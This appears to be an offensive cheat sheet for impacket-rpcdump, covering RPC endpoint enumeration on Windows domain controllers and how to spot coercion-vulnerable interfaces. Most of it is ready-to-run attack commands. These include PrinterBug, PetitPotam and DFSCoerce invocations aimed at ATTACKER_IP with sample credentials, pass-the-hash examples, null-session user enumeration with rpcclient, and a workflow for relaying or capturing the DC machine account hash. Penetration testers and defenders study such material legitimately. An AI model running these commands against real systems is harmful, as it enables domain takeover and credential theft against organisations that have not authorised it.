Skip to main content

Overview

impacket-rpcdump queries the RPC Endpoint Mapper (port 135) to enumerate all registered RPC interfaces and endpoints on a target. The output reveals which services are running and listening, which is valuable for attack planning. Works with NULL sessions by default since the RPC Endpoint Mapper is typically accessible without authentication.

Basic Usage

Dump all RPC endpoints: 
impacket-rpcdump 10.10.10.5
With explicit port: 
impacket-rpcdump 10.10.10.5 -port 135
Output includes protocol, endpoint, UUID, and interface name: 
Protocol: [MS-RPRN]: Print System Remote Protocol
Provider: spoolsv.exe
UUID: 12345678-1234-ABCD-EF00-0123456789AB v1.0
Bindings:
  ncacn_ip_tcp:10.10.10.5[49668]
  ncacn_np:\\DC01[\pipe\spoolss]

Interesting Interfaces

MS-RPRN (PrinterBug / SpoolService)

UUID: 12345678-1234-ABCD-EF00-0123456789AB If the Print Spooler service is running, the target is vulnerable to the PrinterBug (coerce authentication back to attacker). 
impacket-rpcdump 10.10.10.5 | grep -i "MS-RPRN\|spoolsv\|12345678-1234-ABCD"
Exploit with: 
# SpoolSample / PrinterBug
python3 printerbug.py CORP/user:Password1@DC01 ATTACKER_IP

# Or dementor.py
python3 dementor.py -d corp.local -u user -p Password1 ATTACKER_IP DC01

MS-EFSRPC (PetitPotam)

UUID: c681d488-d850-11d0-8c52-00c04fd90f7e (lsarpc) UUID: df1941c5-fe89-4e79-bf10-463657acf44d (efsrpc) Encrypting File System Remote Protocol. Allows unauthenticated coercion on unpatched DCs. 
impacket-rpcdump 10.10.10.5 | grep -i "c681d488\|df1941c5\|EFSRPC\|efsr"
Exploit with: 
python3 PetitPotam.py ATTACKER_IP DC01 -d corp.local -u user -p Password1

MS-DFSNM (DFSCoerce)

UUID: 4fc742e0-4a10-11cf-8273-00aa004ae673 Distributed File System Namespace Management. Another coercion vector. 
impacket-rpcdump 10.10.10.5 | grep -i "4fc742e0\|DFSNM\|dfsr\|netdfs"
Exploit with: 
python3 DFSCoerce.py ATTACKER_IP DC01 -d corp.local -u user -p Password1

Other Notable Interfaces

InterfaceUUID PrefixSignificance
MS-SAMR12345778-1234-ABCD-EF00-0123456789ACSAM database access, user enumeration
MS-LSAD12345778-1234-ABCD-EF00-0123456789ABLSA policy, domain trust info
MS-DRSRe3514235-4b06-11d1-ab04-00c04fc2dcd2Directory Replication (DCSync)
MS-SCMR367abb81-9844-35f1-ad32-98f038001003Service Control Manager (PsExec)
MS-TSCH86d35949-83c9-4044-b424-db363231fd0cTask Scheduler (atexec)
MS-WMI8bc3f05e-d86b-11d0-a075-00c04fb68820WMI (wmiexec)

Filter by Specific Port

Show only endpoints bound to a specific port: 
impacket-rpcdump 10.10.10.5 | grep -A5 "49668"
Show only named pipe bindings: 
impacket-rpcdump 10.10.10.5 | grep "ncacn_np"
Show only TCP bindings: 
impacket-rpcdump 10.10.10.5 | grep "ncacn_ip_tcp"

Authentication

Most of the time, rpcdump works without credentials (NULL session): 
impacket-rpcdump 10.10.10.5
With credentials (if NULL session is blocked): 
impacket-rpcdump CORP/admin:[email protected]
Pass-the-hash: 
impacket-rpcdump -hashes :aad3b435b51404eeaad3b435b51404ee [email protected]

Using Output for Attack Planning

Run rpcdump and check which attack paths are available: 
# Check for coercion attacks
impacket-rpcdump 10.10.10.5 | grep -iE "MS-RPRN|MS-EFSRPC|MS-DFSNM|spoolsv|efsr|netdfs"

# Check if DCSync is possible (MS-DRSR exposed)
impacket-rpcdump 10.10.10.5 | grep -i "e3514235"

# Check for WMI execution (wmiexec)
impacket-rpcdump 10.10.10.5 | grep -i "8bc3f05e"

# Check for Task Scheduler (atexec)
impacket-rpcdump 10.10.10.5 | grep -i "86d35949"

# Check for Service Manager (psexec/smbexec)
impacket-rpcdump 10.10.10.5 | grep -i "367abb81"
Typical workflow:
  1. Run rpcdump on the DC
  2. Identify exposed coercion interfaces (RPRN, EFSRPC, DFSNM)
  3. Set up ntlmrelayx or Responder
  4. Trigger coercion to capture or relay the DC machine account hash
rpcclient (from Samba) complements rpcdump for deeper interaction: 
# Connect with NULL session
rpcclient -U '' -N 10.10.10.5

# Enumerate domain users
rpcclient $> enumdomusers

# Enumerate domain groups
rpcclient $> enumdomgroups

# Get user info by RID
rpcclient $> queryuser 0x1f4

# Get domain password policy
rpcclient $> getdompwinfo

Quick Reference

# Dump all endpoints (NULL session)
impacket-rpcdump 10.10.10.5

# With credentials
impacket-rpcdump CORP/admin:[email protected]

# Pass-the-hash
impacket-rpcdump -hashes :NT_HASH [email protected]

# Check for PrinterBug
impacket-rpcdump 10.10.10.5 | grep -i "MS-RPRN\|spoolsv"

# Check for PetitPotam
impacket-rpcdump 10.10.10.5 | grep -i "c681d488\|df1941c5\|EFSRPC"

# Check for DFSCoerce
impacket-rpcdump 10.10.10.5 | grep -i "4fc742e0\|DFSNM"

# Check all coercion vectors at once
impacket-rpcdump 10.10.10.5 | grep -iE "RPRN|EFSRPC|DFSNM|spoolsv|efsr|netdfs"

# TCP bindings only
impacket-rpcdump 10.10.10.5 | grep "ncacn_ip_tcp"

# Named pipe bindings only
impacket-rpcdump 10.10.10.5 | grep "ncacn_np"

# Custom port
impacket-rpcdump 10.10.10.5 -port 593
FlagDescription
-portTarget port (default: 135)
-hashesNTLM hash for pass-the-hash (LM:NT or :NT)
-target-ipExplicit target IP (when using hostname)